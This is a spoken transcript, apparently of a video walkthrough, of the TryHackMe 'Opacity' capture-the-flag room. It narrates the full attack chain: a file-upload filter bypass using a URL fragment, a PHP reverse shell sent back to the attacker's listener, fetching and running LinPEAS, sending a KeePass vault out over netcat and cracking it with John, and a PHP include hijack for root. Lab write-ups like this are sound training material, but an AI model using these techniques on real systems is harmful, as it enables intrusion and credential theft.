Hello everyone. Today we're doing TryHackMe's opacity. Opacity. So we'll copy the IP address, capture it's a capture flag, so we'll set that. And then we'll do a Rustscan real quick. So we get 2280, 139, and 445. So let's do a Nmap scan on those ports. And then we'll do a Feroxbuster on that port 80. So flags. S&B and as far as I know is not um, used in this one. If you find a way that it's used, I'd like to hear how you used it. This one takes a minute to get the find the stuff we need. All right, so there we go. We get the cloud directory. So let's copy that. Well, no, it's not gonna copy it. Copy this, and then we'll go back to the browser. That's not what I wanted to do. We can stop this. So it says 5-minute file upload. Right here it says external URL, and it takes images. So what we it's also PHP from the login. So what we need to do is we get a shell, a reverse shell, right here. Put your this is the pen test monkey. So make sure that you put your port and IP address that you want to use, or for your VPN or whatever, and then we'll just copy it to a JPEG to test the filter. So .jpg, and then we'll start a Python server and then netcat listener. And then we'll just put our IP address in. So we'll just try that. That's the, it's hard to see, but that's the IP address and the file extension. So we'll try that. And it says that it went through, but it didn't, because if it read it as a PHP file and not a JPEG, it wouldn't have showed a picture here. So if we go here, we didn't get anything, and this was successful, but it didn't run the script. So what we need to do is we can get rid of the one that we made with the JPEG because we don't need that. So we'll have the regular one, and the way to bypass the filter is you'll do what's called a fragment marker. So the hashtag right there is a fragment marker, and what that does is it tells the server to not take anything after that. So it pretty much just erases or deletes the JPEG part of it. So if we upload that one, notice how there's no image here and it's hung right now. So that means that we did get our shell back. So if we stabilize it by shell equals bin bash script q dev null, background it stty, echo raw echo. It's kind of hard to see, but that's what it is. And then foreground, and then export term equals x term, and then stty. So for mine, it's going to do a wraparound and be all funny. So I need to do this and then get my terminal size. That's actually not right. This one. So this one's right. 27, 20, 2021. Because this one's got a little gap right here. So stty rows 27 columns to, what was it, 1 1 1 1. All right, should be good. So we get sysadmin and Ubuntu. So since we already have this Python server running up here, I have Linpeas actually in that same directory. So we'll just actually pull that. So we'll just change directory into the temp, and then we'll do wget to my IP 192.168.2.129 8000 linpeas.sh, and then we'll chmod it. and then we'll just run it right after that. So this is gonna take a little minute to run through everything. All right, so if we go up here, and we get this right here in the op, says unexpected in the op, usually empty. So it's a data set, KDBX, which is a password, a keepass file vault. So if we'll change directory into the opt and look at it, it's owned by us. So, or not by us, but by sysadmin. But we have read write um, or executable. So what we'll do is we'll netcat it to our system. So we'll start a listener on this side. So it'll be and then it's what was it, data set. That's not gonna work if it's not spelled right. Dataset dot KDBX, right? Is it? KDBX, yeah. Dataset KDBX. So we'll start the listener, and then on this side, on this computer, we'll do the same thing. Netcat, not the same thing, but the reverse. So we'll put my IP, and then the port. So just be 6969, and then the opposite way. So because we're sending it, so it'll be data set dot KDBX and enter. So we come over here. It doesn't say anything really. It just says connected. But if you look up here, we'll get it right here. So it's already here. So we can just disconnect right here. And then it disconnects from over here. So now we have the key vault on our side. So now we use Keepass to John. And then John on that Keepass. All right, so we'll just do John. And we get the password, which is whatever that is, that number. So let's copy that and we'll put it up here so we don't lose it. So we need to open up the Keepass file. So I used Keepassxc, and then that says enter the password. So we'll enter the password we got, unlock, and we get the password right here for sysadmin. So if we just Um, so let's get our command ready because this only copies to the clipboard for like 10 seconds. So copy the sysadmin first because we'll need to um, SU is them. So we'll do SU and then paste that. And then we'll copy uh, the see how it says for 10 seconds. So we'll go here, enter, paste, enter, and then now we're sysadmin. So change directory. Now we're in home. There's local text. So local text, there's the first flag. So we don't need this open anymore. We can close that. So now if we look right here, there's a scripts folder. So and the scripts folder is owned by root, but we're accessible by it. So that's weird that it's in our home directory. So let's go into there. And there's a script.php that's owned by us, or in the group. It's in, so the owner's root, but we're in the group for it, and we can read it. So um, let's see what it does. So what it's doing is it's a backup script for the sys admin folder. So it requires once lib backup inc php, and then it zips data from the scripts into the backup zip, and then echoes successful. So what we can do is we can do a path or a library hijacking, since um, we own the library folder. So let's go into the library folder, and there's a bunch of things in here. So let's just rm f and everything in here. So now if we ls, there's nothing in here. Nothing. So what we could do now is we can name a PHP shell backup this and do another PHP reverse shell. So what we'll do is uh, we'll do that, and then we'll change the port in this to one that isn't the same as the one we're already using. And then we'll start another netcat listener. And we need to do the same thing with netcat that we did before, but the opposite way. So we'll come over here onto this machine, since we need to put it in right here, and we'll do netcat whatever port you want. Well, to be LNVP, then whatever port you want, and then no, it's not what it is. Backup dot inc dot php, and then That's listening. And then we need to copy the IP address from here. And then we'll do netcat IP, the port, and then the name of the file, backup.inc.php. And then we come over here, connection received. So if we come over here and we drop this will drop back. Now we have that over here. And if you come over here, you get your shell. Bam! Just like that. So now if we ls, well, actually we can just cat root, what was the proof? It was proof dot text, and we get the last flag. So that's the end of this capture the flag. If you have any comments or like, comment, subscribe. If you have any requests or suggestions, hit me up. Peace.